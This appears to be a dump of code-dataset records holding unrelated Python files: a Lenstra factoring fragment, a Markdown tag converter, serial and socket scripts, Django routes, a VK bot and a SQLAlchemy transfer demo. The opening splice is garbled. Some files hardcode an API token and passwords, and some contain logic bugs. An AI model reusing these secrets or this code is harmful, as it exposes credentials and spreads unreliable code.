\r\n#---------------------------------------------------------------------- \r\ndef Lenstra(n,B,count):\r\n \r\n # 1) Vérifier que :\r\n # n est pas premier\r\n count+=1\r\n if(NombrePremier(n)[0]==True):\r\n return n,count\r\n \r\n # n n'est pas divisible par 2\r\n count+=1\r\n if(n%2==0):\r\n return 2,count\r\n \r\n # n n'est pas divisible par 3\r\n count+=1\r\n if(n%3==0):\r\n return 3,count\r\n \r\n \r\n if(B<2):\r\n #print(\"B : \"+str(B))\r\n print(\"Algo Fail ! \")\r\n return lenstra_list_factor,count\r\n \r\n \r\n # 2) Choisir des entiers aléatoires a,x,y entre 1 et n\r\n RandomOk=False\r\n while(RandomOk==False):\r\n count+=1\r\n Steptwo=False\r\n x,y=randint(1,n-1),randint(1,n-1)\r\n \r\n while(Steptwo==False):\r\n count+=1\r\n \r\n a=randint(1,n-1)\r\n print(\"a : \"+str(a))\r\n print(\"x : \"+str(x))\r\n print(\"y : \"+str(y))\r\n \r\n \r\n \r\n # 3) Calculer b = y**2 − x**3 − a*x (mod n).\r\n b= (pow(y,2)-pow(x,3)-a*x) %n\r\n print(\"b : \"+str(b))\r\n print(\"\")\r\n # 4) Calculer d= pgcd(4a**3 + 27b**2, n)\r\n f=int(4*pow(a,3) + 27*pow(b,2))%n\r\n #print(f)\r\n d=np.gcd(f,n)\r\n print(\"d : \"+str(d))\r\n count+=1+1\r\n # Si 1br '):\n outLines.append('

%s

' % line[4:])\n else:\n outLines.append(line)\n\n return outLines\n\n def intPutConsole(self, text):\n print(text)\n\n def getTime(self):\n now = datetime.now()\n return now.isoformat(' ')[0:19]\n\n\nclass DocumentElement:\n outstandingSubstitutions = True\n substitutions = {}\n elements = []\n inDirName = ''\n fileName = ''\n parentDocumentElement = None\n globalSymbols = False\n\n def __init__(self, globalSymbols=False):\n self.outstandingSubstitutions = True\n self.substitutions = {}\n self.elements = []\n self.inDirName = ''\n self.parentDocumentElement = None\n self.globalSymbols = globalSymbols\n\n def handleLines(self, lines, consPrint, statusPrint):\n ignoreMode = False\n setBlockMode = False\n multiLineSymbolValue = []\n multiLineSymbolName = ''\n for lFull in lines:\n line = self.stripNewLine(lFull)\n words = line.split()\n if ignoreMode:\n if line.startswith('>/ignore'):\n ignoreMode = False\n continue\n if setBlockMode:\n if line.startswith('>/setblock'):\n self.storeSubstitutionValue(multiLineSymbolName, multiLineSymbolValue)\n multiLineSymbolValue = []\n multiLineSymbolName = ''\n setBlockMode = False\n else:\n multiLineSymbolValue.append(line)\n else:\n if line.startswith('>set '):\n lineRemainder = ''\n for i in range(2, len(words)):\n if i > 2:\n lineRemainder += ' '\n lineRemainder += words[i]\n\n self.storeSubstitutionValue(words[1], lineRemainder)\n else:\n if line.startswith('>setblock'):\n multiLineSymbolName = words[1]\n setBlockMode = True\n else:\n if line.startswith('>#'):\n pass\n else:\n if line.startswith('>ignore'):\n ignoreMode = True\n else:\n self.elements.append(line)\n\n def substituteSymbols(self, consPrint, statusPrint):\n self.outstandingSubstitutions = False\n i = 0\n while i < len(self.elements):\n line = self.elements[i]\n if isinstance(line, str):\n words = line.split()\n if line.startswith('>sub'):\n substitutionString = self.lookupSymbol(words[1])\n if len(substitutionString) < 1:\n consPrint('Symbol %s not defined' % words[1])\n self.outstandingSubstitutions = True\n else:\n if isinstance(substitutionString, str):\n if len(words) > 2:\n self.elements[i] = substitutionString + words[2]\n else:\n self.elements[i] = substitutionString\n else:\n del self.elements[i]\n for l in substitutionString:\n self.elements.insert(i, l)\n i += 1\n\n else:\n if isinstance(line, DocumentElement):\n line.substituteSymbols(consPrint, statusPrint)\n if line.outstandingSubstitutions == True:\n self.outstandingSubstitutions = True\n else:\n consPrint('DocumentElement element of unknown type: %s.' % type(line).__name__)\n i += 1\n\n def getLines(self):\n return self.elements\n\n def getTime(self):\n now = datetime.now()\n return now.isoformat(' ')[0:19]\n\n def lookupSymbol(self, symbol):\n result = self.substitutions.get(symbol, '')\n if len(result) > 0:\n return result\n else:\n pDE = self.parentDocumentElement\n if isinstance(pDE, DocumentElement):\n result = pDE.lookupSymbol(symbol)\n if len(result) > 0:\n return result\n else:\n return ''\n else:\n return ''\n\n def stripNewLine(self, line):\n if len(line) > 0:\n if '\\n' == line[(-1)]:\n return line[0:-1]\n return line\n\n def storeSubstitutionValue(self, symbolName, symbolValue):\n if self.globalSymbols:\n parent = self\n while parent != None:\n parentPrevious = parent\n parent = parent.parentDocumentElement\n parentPrevious.substitutions[symbolName] = symbolValue\n\n else:\n self.substitutions[symbolName] = symbolValue\n\n def printElements(self, recurseDepth):\n print('printElements() starting, %d elements, recurse depth: %d...' % (len(self.elements), recurseDepth))\n for line in self.elements:\n if isinstance(line, str):\n print('Str: %s' % line)\n else:\n if isinstance(line, DocumentElement):\n print('DocumentElement child begin:')\n line.printElements(recurseDepth + 1)\n print('DocumentElement child end.')\n else:\n print('DocumentElement element of unknown type: %s.' % type(line).__name__)\n\n print('printElements: substitutions:')\n for key in self.substitutions.keys():\n print('Key %s: %s' % (key, self.substitutions.get(key)))\n\n def writeElements(self, f, elements, consPrint, statusPrint):\n for line in elements:\n if isinstance(line, str):\n f.write('%s\\n' % line)\n else:\n if isinstance(line, DocumentElement):\n line.writeElements(f, line.elements, consPrint, statusPrint)\n else:\n consPrint('DocumentElement element of unknown type: %s.' % type(line).__name__)\n\n\nclass SimpleConversions:\n\n def transform(self, documentElement, consPrint, statusPrint):\n i = 0\n while i < len(documentElement.elements):\n line = documentElement.elements[i]\n if isinstance(line, str):\n replacementString = ''\n if line.startswith('>datetime'):\n replacementString = datetime.now().isoformat(' ')[0:19]\n else:\n if line.startswith('>date'):\n replacementString = datetime.now().isoformat(' ')[0:10]\n else:\n if line.startswith('>time'):\n replacementString = datetime.now().isoformat(' ')[11:19]\n else:\n if line.startswith('>br'):\n words = line.split()\n l = words[0]\n if len(l) == 3:\n replacementString = '
'\n else:\n repetitionNoString = l[3:]\n if repetitionNoString.isnumeric():\n repetitionNo = int(repetitionNoString)\n while repetitionNo > 0:\n replacementString += '
'\n repetitionNo -= 1\n\n if len(replacementString) > 0:\n words = line.split()\n wordCount = 0\n for word in words:\n if wordCount == 1:\n replacementString += word\n if wordCount > 1:\n replacementString += ' ' + word\n wordCount += 1\n\n documentElement.elements[i] = replacementString\n else:\n if isinstance(line, DocumentElement):\n simpleConversions = SimpleConversions()\n simpleConversions.transform(line, consPrint, statusPrint)\n else:\n consPrint('DocumentElement element of unknown type: %s.' % type(line).__name__)\n i += 1\n\n\nclass TableConversion:\n\n def __init__(self):\n pass\n\n def produceSymbolicNumbers(self, documentElement, consPrint, statusPrint):\n tableRowCounter = 0\n i = 0\n while i < len(documentElement.elements):\n line = documentElement.elements[i]\n if isinstance(line, str):\n words = line.split()\n if line.startswith('>cell'):\n if len(words) > 1:\n command = words[1]\n if command.startswith('*'):\n if command == '*start':\n tableRowCounter = 1\n documentElement.elements[i] = '>cell %s' % tableRowCounter\n else:\n if command == '*incr':\n tableRowCounter += 1\n documentElement.elements[i] = '>cell %s' % tableRowCounter\n if len(words) > 2:\n symbol = words[2]\n documentElement.substitutions[symbol] = '%d' % tableRowCounter\n else:\n if isinstance(line, DocumentElement):\n self.produceSymbolicNumbers(line, consPrint, statusPrint)\n else:\n consPrint('DocumentElement element of unknown type: %s.' % type(line).__name__)\n i += 1\n\n def convertTable(self, documentElement, consPrint, statusPrint):\n currColNo = 0\n noOfCols = 0\n cellContents = ''\n rowContents = ''\n caption = ''\n tableNo = 0\n tableMode = False\n linesIn = []\n i = 0\n while i < len(documentElement.elements):\n line = documentElement.elements[i]\n if isinstance(line, str):\n words = line.split()\n if tableMode:\n del documentElement.elements[i]\n i -= 1\n if len(line.strip()) < 1 or line.startswith('>/row'):\n savedContents = self.closeCell(cellContents)\n cellContents = ''\n if len(savedContents) > 0:\n rowContents += savedContents\n if noOfCols > 0:\n while currColNo < noOfCols:\n rowContents += ' |'\n currColNo += 1\n\n if len(rowContents) > 0:\n linesIn.append(rowContents)\n linesIn.append('')\n rowContents = ''\n if line.startswith('>/row'):\n caption = ''\n if len(words) > 1:\n for j in range(1, len(words)):\n if j == 1:\n if words[j].strip() == '*tableno':\n tableNo += 1\n else:\n caption += words[j].strip()\n else:\n caption += ' '\n caption += words[j].strip()\n\n if tableNo > 0:\n linesIn.append('**Table %d: %s**' % (tableNo, caption))\n else:\n linesIn.append('**%s**' % caption)\n for line in linesIn:\n i += 1\n documentElement.elements.insert(i, line)\n\n currColNo = 0\n tableMode = False\n linesIn = []\n else:\n if line.startswith('>row'):\n savedContents = self.closeCell(cellContents)\n cellContents = ''\n if len(savedContents) > 0:\n rowContents += savedContents\n if noOfCols > 0:\n while currColNo < noOfCols:\n rowContents += ' |'\n currColNo += 1\n\n linesIn.append(rowContents)\n rowContents = '|'\n currColNo = 0\n else:\n if line.startswith('>cell'):\n savedContents = self.closeCell(cellContents)\n cellContents = ''\n if len(savedContents) > 0:\n rowContents += savedContents\n lineRemainder = ''\n if len(words) > 1:\n for j in range(1, len(words)):\n if j > 1:\n lineRemainder += ' '\n lineRemainder += words[j].strip()\n\n cellContents = lineRemainder\n else:\n cellContents = ' '\n currColNo += 1\n else:\n if len(cellContents) > 0:\n if cellContents == ' ':\n cellContents = ''\n else:\n cellContents += ' '\n else:\n cellContents += line.strip()\n elif line.startswith('>row'):\n del documentElement.elements[i]\n i -= 1\n cellContents = ''\n tableMode = True\n if len(words) > 1:\n noOfCols = int(words[1])\n else:\n noOfCols = 0\n currColNo = 0\n rowContents = '|'\n else:\n if isinstance(line, DocumentElement):\n tableConversion = TableConversion()\n tableConversion.convertTable(line, consPrint, statusPrint)\n else:\n consPrint('TableConversion: DocumentElement element of unknown type: %s.' % type(line).__name__)\n i += 1\n\n def closeCell(self, cellContents):\n if len(cellContents) == 0:\n return ''\n else:\n return cellContents + '|'\n\n\nclass OrderedListConversion:\n\n def __init__(self):\n pass\n\n def produceSymbolicNumbers(self, documentElement: DocumentElement, consPrint, statusPrint):\n listItemCounter = 0\n i = 0\n insideListItem = False\n while i < len(documentElement.elements):\n line = documentElement.elements[i]\n if isinstance(line, str):\n words = line.split()\n if line.startswith('>li'):\n insideListItem = True\n if len(words) > 1:\n command = words[1]\n if command.startswith('*'):\n if command == '*start':\n listItemCounter = 1\n documentElement.elements[i] = '%s. ' % listItemCounter\n else:\n if command == '*incr':\n listItemCounter += 1\n documentElement.elements[i] = '%s. ' % listItemCounter\n if len(words) > 2:\n symbol = words[2]\n documentElement.substitutions[symbol] = '%d' % listItemCounter\n else:\n listItemCounter += 1\n documentElement.elements[i] = '%s. %s' % (listItemCounter, self.fetchRemainder(words))\n else:\n listItemCounter += 1\n documentElement.elements[i] = '%s. ' % listItemCounter\n else:\n if line.startswith('>/li'):\n insideListItem = False\n del documentElement.elements[i]\n i -= 1\n else:\n if insideListItem:\n documentElement.elements[(i - 1)] += line\n del documentElement.elements[i]\n i -= 1\n insideListItem = False\n else:\n if isinstance(line, DocumentElement):\n self.produceSymbolicNumbers(line, consPrint, statusPrint)\n else:\n consPrint('OrderedListConverision: DocumentElement element of unknown type: %s.' % type(line).__name__)\n i += 1\n\n def convertOrderedList(self, documentElement: DocumentElement, consPrint, statusPrint):\n orderedListMode = False\n linesIn = []\n i = 0\n while i < len(documentElement.elements):\n line = documentElement.elements[i]\n if isinstance(line, str):\n words = line.split()\n if line.startswith('>li'):\n linesIn.append(self.fetchRemainder(words))\n else:\n if line.startswith('>/li'):\n pass\n else:\n linesIn.append(line)\n else:\n if isinstance(line, DocumentElement):\n orderedListConversion = OrderedListConversion()\n orderedListConversion.convertOrderedList(line, consPrint, statusPrint)\n else:\n consPrint('OrderedListConversion: DocumentElement element of unknown type: %s.' % type(line).__name__)\n i += 1\n\n def fetchRemainder(self, words):\n lineRemainder = ''\n if len(words) > 1:\n for j in range(1, len(words)):\n if j > 1:\n lineRemainder += ' '\n lineRemainder += words[j].strip()\n\n return lineRemainder","sub_path":"pycfiles/tagtomarkdown-0.4.0-py3.6/tagtomarkdown.cpython-36.py","file_name":"tagtomarkdown.cpython-36.py","file_ext":"py","file_size_in_byte":21355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"596790067","text":"import asyncio\nimport socket\nimport os\nimport xml.dom.minidom as minidom\nimport xml.etree.ElementTree as ET\nfrom threading import Thread\nimport time\nfrom datetime import datetime, timedelta\nimport serial\nimport struct\n\nDEBUG_XML = False\nDEBUG_REDE = True\nDEBUG_TIME = True\n\nser = serial.Serial(\n port='/dev/ttyS0',\n baudrate =9600, \n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=1)\n\n\nff = struct.pack('B', 0xff)\n\nfile_config = 'ConfigM.xml'\n\nfull_file = os.path.abspath(os.path.join('data'))\n\n\narq_config = os.path.abspath(os.path.join('data', file_config))\n\nif DEBUG_XML:\n xmlConfig = minidom.parse(arq_config)\n listaOperadoresXml = xmlConfig.getElementsByTagName('operador')\n listaOperadores = []\n for operador in listaOperadoresXml:\n listaOperadores.append(operador.firstChild.nodeValue)\n\n print(listaOperadores)\n\n tela = 0\n\n tela = tela + 1 if False else tela - 1\n print(tela)\n\n\nif DEBUG_REDE:\n PORTA_BASE_PADRAO = 32000\n MAQUINA = 2\n PORT = PORTA_BASE_PADRAO + MAQUINA\n class Server(Thread):\n def __init__(self):\n Thread.__init__(self)\n #self.daemon = True\n self.start()\n def run(self):\n while True:\n print('A')\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n sock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1 )\n HOST = socket.gethostname()\n sock.bind((HOST, PORT))\n sock.listen()\n\n client, addr = sock.accept()\n\n with client:\n print('Connectado a', addr)\n btipo = client.recv(1)\n tipo = btipo.decode(\"utf-8\")\n if btipo is 'c' or 'p': # c = config (ou seja, receber info de maquina), p = prod/paradas (ou seja, enviar xmls)\n client.send(btipo) # echo\n if tipo is 'c':\n stream = client.recv(1024000)\n root = ET.fromstring(stream)\n with open(arq_config,'w') as arq:\n arq.write(ET.tostring(root).decode())\n else:\n xmlStream = ET.parse(arq_paradas)\n xmlstr = ET.tostring(xmlStream.getroot()).decode()\n client.send(bytes(xmlstr, \"utf-8\"))\n\n xmlStream = ET.parse(arq_prod)\n xmlstr = ET.tostring(xmlStream.getroot()).decode()\n client.send(bytes(xmlstr, \"utf-8\"))\n else:\n print('Erro!')\n \n\n \n\nif DEBUG_REDE:\n Server()\n\n #while True:\n # pass\n\n\nif DEBUG_TIME:\n class TimeRTC(Thread):\n def __init__(self):\n Thread.__init__(self)\n #self.daemon = True\n self.start()\n def run(self):\n while True:\n startTempo = datetime.now()\n while datetime.now() - startTempo < timedelta(seconds=.1):\n pass\n \n now = datetime.now()\n second = '{:02d}'.format(now.second)\n second = str(second)\n minute = '{:02d}'.format(now.minute)\n minute = str(minute)\n hour = '{:02d}'.format(now.hour)\n hour = str(hour)\n \n tempo = hour + ':' + minute + ':' + second\n tempo = bytes('\"'+str(tempo)+'\"', encoding='iso-8859-1')\n \n ser.write(b't1.txt=')\n ser.write(tempo)\n ser.write(ff+ff+ff)\n \n x = ser.readlines()\n print(x)\n if x:\n print('A')\n for y in x:\n _, sinal, _ = str(y).split(\"'\")\n print(sinal)\n sinal = sinal.replace('\\\\xff\\\\xff\\\\xff', '')\n print(sinal)\n e, info1, info2, info3 = sinal.split('\\\\x')\n print(info2)\n\n\nif DEBUG_TIME:\n TimeRTC()\n\n ","sub_path":"TestezinhoCiex.py","file_name":"TestezinhoCiex.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"146384177","text":"from django.contrib import admin\nfrom django.urls import path ,include\nfrom books.views import *\n\n\napp_name = 'books'\n\nurlpatterns = [\n path('', home,name='home'),\n \n # Author\n \n path('author/',AuthorListView.as_view(),name='authorlist'),\n path('author/add/',AuthorCreateView.as_view(),name=\"authoradd\"),\n path('author//update/',AuthorUpdateView.as_view(),name=\"authorupdate\"),\n path('author//delete/',AuthorDeleteView.as_view(),name=\"authordelete\"), \n path('author//',AuthorDetail,name=\"authordetail\"),\n \n \n # Book\n path('book/',BooksListView.as_view(),name='booklist'),\n path('book/add/',BookCreateView.as_view(),name='bookcreate'),\n path('book//delete/',BookDeleteView.as_view(),name=\"bookdelete\"),\n path('book//update/',BookUpdateView.as_view(),name=\"bookupdate\"),\n path('book//',BooksDetailView.as_view(),name=\"bookdetail\"),\n \n # TBR\n path('readinglist/',TBRListView.as_view(),name='tbrlist'),\n path('readinglist/add/',TBRCreate.as_view(),name='tbrcreate'),\n path('readinglist//update/',TBRUpdate.as_view(),name='tbrupdate'),\n path('readinglist//delete/',TBRDelete.as_view(),name='tbrdelete'),\n path('readinglist//',TBRDetail,name='tbrdetail'),\n \n # Genre\n path('genre/',GenreListView.as_view(),name=\"genrelist\"),\n path('genre/add/',GenreCreateView.as_view(),name=\"genrecreate\"),\n path('genre//update/',GenreUpdateView.as_view(),name=\"genreupdate\"),\n path('genre//delete/',GenreDeleteView.as_view(),name=\"genredelete\"),\n path('genre//',GenreDetail,name=\"genredetail\"),\n\n # Batch Process\n path('batchupload/',batchprocess,name=\"batchload\"),\n \n #Search\n path('search/',Search.as_view(),name=\"search\"),\n \n ]\n","sub_path":"books/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"141145218","text":"import vk_api\nfrom vk_api.longpoll import VkLongPoll, VkEventType\nfrom vk_api.utils import get_random_id\n\ndef send_message(sender, message):\n authorize.method('messages.send', {'user_id': sender, 'message': message, 'random_id': get_random_id()})\n\n#last = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\npeople = []\n\ntoken = \"0c8eafaca1234de0b8a7d6dee3092bb1a7b9bc3797795d35a7f5f56cf2377f7239a33e08445ddbe19cfae\"\nauthorize = vk_api.VkApi(token=token)\nlongpoll = VkLongPoll(authorize)\n\nfor event in longpoll.listen():\n if event.type == VkEventType.MESSAGE_NEW and event.to_me and event.text:\n nikita = 320331416\n tim = 472247625\n dima = 232515926\n stas = 229459286\n received_message = event.text\n rm = received_message.lower()\n sender = event.user_id\n if rm[:12] == \"набор старт \":\n count = int(rm[12:])\n i = 0\n people = []\n send_message(nikita, \"Набор на тренировку начался\") \n send_message(dima, \"Набор на тренировку начался\")\n send_message(tim, \"Набор на тренировку начался\")\n send_message(stas, \"Набор на тренировку начался\")\n if rm == \"список\":\n itog1 = \"\"\n a1 = 0\n for i in range(len(people)):\n itog1 += '{}. '.format(a1 + 1) + people[a1] + \"\\n\"\n a1 += 1\n if itog != \"\":\n send_message(dima, itog1)\n send_message(tim, itog1)\n send_message(nikita, itog1)\n send_message(stas, itog1)\n else:\n send_message(dima, \"Список пуст\")\n send_message(tim, \"Список пуст\")\n send_message(nikita, \"Список пуст\")\n send_message(stas, \"Список пуст\")\n if rm[:6] == 'секция':\n false = 0\n for i in range(len(people)):\n if received_message[7:] == people[i]:\n send_message(sender, \"Ты уже есть в списках!\")\n false = 1\n break\n else:\n i += 1\n if i == count:\n send_message(sender, \"⚠ Упс...\\n\\n• Набор на ДАННУЮ тренировку закончен, мест больше нет!\\n\\n✅ Следите за информацией о новых тренировках в группе секции: vk.com/basketball_in_mirea\")\n false = 1\n if false != 1:\n if i == len(people):\n people.append(received_message[7:])\n send_message(sender, \"Твой порядковый номер: {}\".format(i + 1))\n a = 0\n itog = \"\"\n for i in range(len(people)):\n itog += '{}. '.format(i + 1) + people[a] + \"\\n\"\n a += 1\n if i == (count - 1):\n send_message(dima, itog)\n send_message(tim, itog)\n send_message(nikita, itog)\n send_message(stas, itog)\n","sub_path":"basketbot.py","file_name":"basketbot.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"301198251","text":"\n\nfrom xai.brain.wordbase.nouns._dentist import _DENTIST\n\n#calss header\nclass _DENTISTS(_DENTIST, ):\n\tdef __init__(self,): \n\t\t_DENTIST.__init__(self)\n\t\tself.name = \"DENTISTS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"dentist\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_dentists.py","file_name":"_dentists.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"334090399","text":"#\n# Author: George Paraskevopoulos (geopar@intracom-telecom.com)\n# Manuel Buil (manuel.buil@ericsson.com)\n# Prepares the controller and the compute nodes for the odl-sfc testcase\n#\n#\n# All rights reserved. This program and the accompanying materials\n# are made available under the terms of the Apache License, Version 2.0\n# which accompanies this distribution, and is available at\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n\nimport os\nimport paramiko\nimport subprocess\nimport sys\n\nimport functest.utils.functest_logger as ft_logger\n\n\nlogger = ft_logger.Logger(__name__).getLogger()\n\nSFC_REPO_DIR = \"/home/opnfv/repos/sfc\"\n\ntry:\n INSTALLER_IP = os.environ['INSTALLER_IP']\nexcept:\n logger.debug(\"INSTALLER_IP does not exist. We create 10.20.0.2\")\n INSTALLER_IP = \"10.20.0.2\"\n\nos.environ['ODL_SFC_LOG'] = \"/home/opnfv/functest/results/sfc.log\"\nos.environ['ODL_SFC_DIR'] = os.path.join(SFC_REPO_DIR,\n \"sfc/tests/functest\")\nSETUP_SCRIPTS_DIR = os.path.join(os.environ['ODL_SFC_DIR'], 'setup_scripts')\n\ncommand = SETUP_SCRIPTS_DIR + (\"/server_presetup_CI.bash | \"\n \"tee -a ${ODL_SFC_LOG} 1>/dev/null 2>&1\")\n\noutput = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n\n# This code is for debugging purposes\n# for line in iter(output.stdout.readline, ''):\n# i = line.rstrip()\n# print(i)\n\n# Make sure the process is finished before checking the returncode\nif not output.poll():\n output.wait()\n\n# Get return value\nif output.returncode:\n print(\"The presetup of the server did not work\")\n sys.exit(output.returncode)\n\nlogger.info(\"The presetup of the server worked \")\n\nssh_options = \"-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no\"\nssh = paramiko.SSHClient()\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\ntry:\n ssh.connect(INSTALLER_IP, username=\"root\",\n password=\"r00tme\", timeout=2)\n command = \"fuel node | grep compute | awk '{print $10}'\"\n logger.info(\"Executing ssh to collect the compute IPs\")\n (stdin, stdout, stderr) = ssh.exec_command(command)\nexcept:\n logger.debug(\"Something went wrong in the ssh to collect the computes IP\")\n\noutput = stdout.readlines()\nfor ip in output:\n command = SETUP_SCRIPTS_DIR + (\"/compute_presetup_CI.bash \" + ip.rstrip() +\n \"| tee -a ${ODL_SFC_LOG} 1>/dev/null 2>&1\")\n\n output = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n\n# This code is for debugging purposes\n# for line in iter(output.stdout.readline, ''):\n# print(line)\n# sys.stdout.flush()\n\n output.stdout.close()\n\n if not (output.poll()):\n output.wait()\n\n # Get return value\n if output.returncode:\n print(\"The compute config did not work on compute %s\" % ip)\n sys.exit(output.returncode)\n\nsys.exit(0)\n","sub_path":"sfc/tests/functest/setup_scripts/prepare_odl_sfc.py","file_name":"prepare_odl_sfc.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"501511635","text":"import logging\nfrom datetime import datetime, timedelta\nfrom socketserver import BaseRequestHandler\n\nfrom mdcs.tcp.avro import unserialize_value\n\nfrom .schema import EVENT_SCHEMA\nfrom .server import MulticastServer\n\n\nclass PublishRequestHandler(BaseRequestHandler):\n def setup(self):\n self.logger = logging.getLogger(__name__)\n\n self.registry = self.server.registry\n self.packet, self.socket = self.request\n\n def handle(self):\n try:\n # parse the event message\n message = unserialize_value(EVENT_SCHEMA, self.packet)\n\n # check if it's a command\n if 'command' not in message:\n return\n\n # process the command\n if message['command'] == 'DISCOVER':\n for node in self.registry.nodes.values():\n self.server.send_message({\n 'node': node.name,\n 'config': {\n 'host': node.host,\n 'http_port': node.http_port,\n 'tcp_port': node.tcp_port\n },\n 'event': 'ONLINE'\n })\n\n for device in self.registry.devices.values():\n self.server.send_message({\n 'node': device.node,\n 'device': device.name,\n 'event': 'ONLINE'\n })\n\n # XXX: catch specific exceptions?\n except Exception as e:\n self.logger.error('multicast publish handler', exc_info=e)\n\n\nclass MulticastPublishServer(MulticastServer):\n \"\"\"\n A multicast network server that publishes the contents of a Registry.\n \"\"\"\n\n def __init__(self, config, registry):\n super().__init__(config, PublishRequestHandler)\n self.registry = registry\n self._publish_timeout = datetime.now()\n\n def service_actions(self):\n # periodically send out ONLINE states for nodes and devices\n publish_time = datetime.now()\n if publish_time > self._publish_timeout:\n for node in self.registry.nodes.values():\n self.send_message({\n 'node': node.name,\n 'config': {\n 'host': node.host,\n 'http_port': node.http_port,\n 'tcp_port': node.tcp_port\n },\n 'event': 'ONLINE'\n })\n\n for device in self.registry.devices.values():\n self.send_message({\n 'node': device.node,\n 'device': device.name,\n 'event': 'ONLINE'\n })\n\n # XXX this should be a configuration setting\n self._publish_timeout = publish_time + timedelta(seconds=30)\n\n def shutdown(self):\n # send out OFFLINE messages for nodes\n for node in self.registry.nodes.values():\n self.send_message({\n 'node': node.name,\n 'config': {\n 'host': node.host,\n 'http_port': node.http_port,\n 'tcp_port': node.tcp_port\n },\n 'event': 'OFFLINE'\n })\n\n # stop the server\n super().shutdown()\n","sub_path":"pkg/libmdcs-python/mdcs/discovery/multicast/publish.py","file_name":"publish.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"56045281","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nimport logging\nimport pymysql\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import Column, Integer, String, DateTime, and_\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nmysql_host = \"192.168.136.128\"\nmysql_port = 3306\nmysql_user = \"testuser\"\nmysql_password = \"fT866jN^\"\nmysql_db = \"testdb\"\ndb_url = f\"mysql+pymysql://{mysql_user}:{mysql_password}@{mysql_host}/{mysql_db}?charset=utf8mb4\"\nuser_table = \"user\"\nasset_table = \"asset\"\naudit_table = \"audit\"\n\nBase = declarative_base()\n\n\nclass UserTable(Base):\n __tablename__ = user_table\n user_id = Column(Integer(), primary_key=True, nullable=False)\n user_name = Column(String(50), nullable=False, unique=True)\n create_time = Column(DateTime(), default=datetime.now)\n\n\nclass AssetTable(Base):\n __tablename__ = asset_table\n user_id = Column(Integer(), primary_key=True, nullable=False)\n total_asset = Column(Integer, nullable=False)\n update_time = Column(DateTime(), default=datetime.now, onupdate=datetime.now)\n\n\nclass AuditTable(Base):\n __tablename__ = audit_table\n trade_id = Column(Integer(), autoincrement=True, primary_key=True, nullable=False)\n trade_time = Column(DateTime(), nullable=False)\n from_user_id = Column(Integer(), nullable=False)\n to_user_id = Column(Integer(), nullable=False)\n trade_asset = Column(Integer, nullable=False)\n\n\ndef init_trade_info(orm_session_maker):\n\n user_1 = UserTable(\n user_id=1,\n user_name=\"张三\"\n )\n user_2 = UserTable(\n user_id=2,\n user_name=\"李四\"\n )\n\n user_1_asset = AssetTable(\n user_id=1,\n total_asset=50\n )\n\n user_2_asset = AssetTable(\n user_id=2,\n total_asset=20\n )\n\n sqlalchemy_session = orm_session_maker()\n try:\n sqlalchemy_session.add(user_1)\n sqlalchemy_session.add(user_2)\n sqlalchemy_session.add(user_1_asset)\n sqlalchemy_session.add(user_2_asset)\n sqlalchemy_session.commit()\n except Exception as e:\n logger.error(e)\n finally:\n sqlalchemy_session.close()\n\n\ndef transfer_account(orm_session_maker):\n sqlalchemy_session = orm_session_maker(autocommit=False)\n from_user_name = \"张三\"\n to_user_name = \"李四\"\n trade_value = 100\n try:\n\n from_user_id = sqlalchemy_session.query(UserTable.user_id).filter(\n UserTable.user_name == from_user_name,\n ).one()[0]\n\n to_user_id = sqlalchemy_session.query(UserTable.user_id).filter(\n UserTable.user_name == to_user_name,\n ).one()[0]\n\n from_user_asset_entity = sqlalchemy_session.query(AssetTable).filter(\n AssetTable.user_id == from_user_id,\n ).one()\n\n to_user_asset_entity = sqlalchemy_session.query(AssetTable).filter(\n AssetTable.user_id == to_user_id,\n ).one()\n\n if from_user_asset_entity.total_asset >= trade_value:\n from_user_asset_entity.total_asset -= trade_value\n to_user_asset_entity.total_asset += trade_value\n audit_record = AuditTable(\n trade_time=datetime.now(),\n from_user_id=from_user_id,\n to_user_id=to_user_id,\n trade_asset=trade_value\n )\n sqlalchemy_session.add(audit_record)\n else:\n err_msg = f\"{from_user_name} 账户余额不足, 转账失败\"\n logger.error(err_msg)\n raise Exception(err_msg)\n\n sqlalchemy_session.commit()\n\n except Exception as e:\n logger.error(e)\n sqlalchemy_session.rollback()\n finally:\n sqlalchemy_session.close()\n\n\ndef main():\n sqlalchemy_engine = create_engine(db_url, echo=True, encoding=\"utf-8\")\n # 创建表\n Base.metadata.create_all(sqlalchemy_engine)\n orm_session_maker = sessionmaker(bind=sqlalchemy_engine)\n # 插入基础数据\n init_trade_info(orm_session_maker)\n # 交易\n transfer_account(orm_session_maker)\n\n\nif __name__ == 